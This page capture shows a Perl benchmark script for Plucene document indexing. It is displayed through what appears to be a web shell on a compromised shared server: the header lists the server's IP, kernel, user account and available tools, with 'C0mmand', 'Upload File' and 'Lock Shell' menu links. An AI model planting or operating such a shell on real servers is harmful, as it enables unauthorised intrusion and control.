hyun.psd; gzuncompress
|
Server IP : 173.236.192.202 / Your IP : 216.73.216.85 Web Server : Apache System : Linux iad1-shared-e1-03 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64 User : andfor18 ( 14551322) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /usr/bin/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
|---|
#!/usr/bin/perl
use strict;
use warnings;
use Plucene;
use Plucene::TestCase;
use Benchmark 'cmpthese';
use File::Slurp;
chomp(my @words = read_file('/usr/share/dict/enable'));
my $sentence = sub {
my $words = shift;
return join " ", map $words[ rand @words ], 1 .. $words;
};
sub add_sentences {
my $length = shift;
new_index { add_document(content => $sentence->($length)) for 1 .. 100 };
}
print Plucene->VERSION, "\n";
cmpthese(
10 => {
'short' => sub { add_sentences(1) },
'medium' => sub { add_sentences(10) },
'long' => sub { add_sentences(100) },
});